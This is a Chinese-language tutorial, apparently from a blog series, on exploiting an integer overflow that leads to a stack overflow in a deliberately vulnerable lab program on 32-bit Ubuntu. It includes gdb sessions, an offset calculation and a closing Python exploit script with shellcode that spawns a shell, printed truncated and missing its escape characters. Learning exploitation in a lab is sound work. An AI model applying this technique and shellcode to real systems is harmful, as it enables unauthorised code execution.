Linux Exploit系列之二 整数溢出

整数溢出

虚拟机安装：Ubuntu 12.04（x86）

什么是整数溢出？

存储大于最大支持值的值称为整数溢出。整数溢出本身不会导致任意代码执行，但整数溢出可能会导致堆栈溢出或堆溢出，这可能导致任意代码执行。在这篇文章中，我将仅谈论整数溢出导致堆栈溢出，整数溢出导致堆溢出将在后面的单独的帖子中讨论。

后边的内容复制粘贴好烦，还是说关键点吧！

原文见：https://bbs.pediy.com/thread-216869.htm

这个文章解释的比上一个清楚多了，相信能看懂，唯一不懂的，和上一篇估计一样，还是地址计算的问题

同样是使用gdb 调试：gdb -q vuln

下边解释下我是如何找地址的(虚拟机环境Ubuntu14.04 32位系统，gcc 4.8.2)

首先使用disassemble 查看汇编代码，看看程序的汇编代码布局：

(gdb) disassemble validate_passwd
Dump of assembler code for function validate_passwd:
   0x08048507 <+0>:    push   %ebp
   0x08048508 <+1>:    mov    %esp,%ebp
   0x0804850a <+3>:    sub    $0x28,%esp
   0x0804850d <+6>:    mov    0x8(%ebp),%eax
   0x08048510 <+9>:    mov    %eax,(%esp)
   0x08048513 <+12>:    call   0x80483e0 <strlen@plt>
   0x08048518 <+17>:    mov    %al,-0x9(%ebp)
   0x0804851b <+20>:    cmpb   $0x3,-0x9(%ebp)
   0x0804851f <+24>:    jbe    0x8048554 <validate_passwd+77>
   0x08048521 <+26>:    cmpb   $0x8,-0x9(%ebp)
   0x08048525 <+30>:    ja     0x8048554 <validate_passwd+77>
   0x08048527 <+32>:    movl   $0x8048670,(%esp)
   0x0804852e <+39>:    call   0x80483b0 <puts@plt>
   0x08048533 <+44>:    mov    0x804a040,%eax
   0x08048538 <+49>:    mov    %eax,(%esp)
   0x0804853b <+52>:    call   0x8048390 <fflush@plt>
   0x08048540 <+57>:    mov    0x8(%ebp),%eax
   0x08048543 <+60>:    mov    %eax,0x4(%esp)
   0x08048547 <+64>:    lea    -0x14(%ebp),%eax
   0x0804854a <+67>:    mov    %eax,(%esp)
   0x0804854d <+70>:    call   0x80483a0 <strcpy@plt>

嗯，发现编译器改动不大，就是将strlen函数直接内嵌了，没有使用函数调用(库函数的惯用做法)，不多解释

(gdb) list 看一眼源码，方便下断点

(gdb) b validate_passwd 下断

然后开心的按照作者说的运行

下边是调试步骤

Reading symbols from vuln...done.
(gdb) b validate_passwd
Breakpoint 1 at 0x804850d: file vuln.c, line 14.
(gdb) r sploitfun `python -c 'print "A"*261'`
Starting program: /home/jourluohua/work/test2/vuln sploitfun `python -c 'print "A"*261'`

Breakpoint 1, validate_passwd (
    passwd=0xbffff6b6 'A' <repeats 200 times>...) at vuln.c:14
14     unsigned char passwd_len = strlen(passwd); /* [1] */ 
(gdb) n　　　　　　　　//单步调试，想看看执行到了我们认为的关键的代码没有，很明显这儿还不是关键代码
15     if(passwd_len >= 4 && passwd_len <= 8) { /* [2] */
(gdb) n
16      printf("Valid Password
"); /* [3] */ 
(gdb) p passwd_len　　//这儿是关键处了，但是如果是正确的话，passwd_len 应该是'A',很可能是程序还没真正执行到
$1 = 5 '05'
(gdb) n
Valid Password
17      fflush(stdout);
(gdb) n
18      strcpy(passwd_buf,passwd); /* [4] */
(gdb) n
23     store_passwd_indb(passwd_buf); /* [6] */
(gdb) p passwd_len　　　　//好终于到了我们想要的地方了
$2 = 65 'A'
(gdb) p &passwd_len　　　//passwd_len的地址，既然利用的是栈，我们在乎的是内存布局
$3 = (unsigned char *) 0xbffff46f 'A' <repeats 200 times>...
(gdb) p buf　　　　　　　　//手误，没有任何原因
$4 = 0x0
(gdb) n
24    }
(gdb) p passwd_buf　　　　//passwd_buf的值也对了
$5 = 'A' <repeats 11 times>
(gdb) p &passwd_buf[0]　　//passwd_buf的地址也和我们想象的一样
$6 = 0xbffff464 'A' <repeats 200 times>...
(gdb) p/x $eip　　　　　　//很明显还没有被覆盖
$7 = 0x8048578
(gdb) p/x $ebp　　　　　　//这个真的不是在凑字数，ebp的地址很重要
$8 = 0xbffff478
(gdb) n
0x41414141 in ?? ()
(gdb) p/x $eip　　　　　　//好，已经覆盖了
$9 = 0x41414141
(gdb) p/x $ebp
$10 = 0x41414141
(gdb) 

按照我上边的注释，相信大家对调试过程已经有了一定了解，现在说下地址的计算

$ebp - &passwd_buf[0] +4   = 0x18 = $eip - &passwd_buf[0]

这就是所谓的内存偏移，有了这个，我们的ret_addr就可以算出来了

ret_addr= 0xbffff464 +0x18 + 100

还是老规矩，附上我的exp.python 代码

#exp.py 
#!/usr/bin/env python
import struct
from subprocess import call

arg1 = "sploitfun"

#Stack address where shellcode is copied.
ret_addr = 0xbffff4e0

#Spawn a shell
#execve(/bin/sh)
scode = "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3$

#endianess convertion
def conv(num):
 return struct.pack("<I",num)#unk + RA + NOP's + Shellcode
arg2 = "A" * 24
arg2 += conv(ret_addr);
arg2 += "x90" * 100
arg2 += scode
arg2 += "C" * 108

print "Calling vulnerable program"
call(["./vuln", arg1, arg2])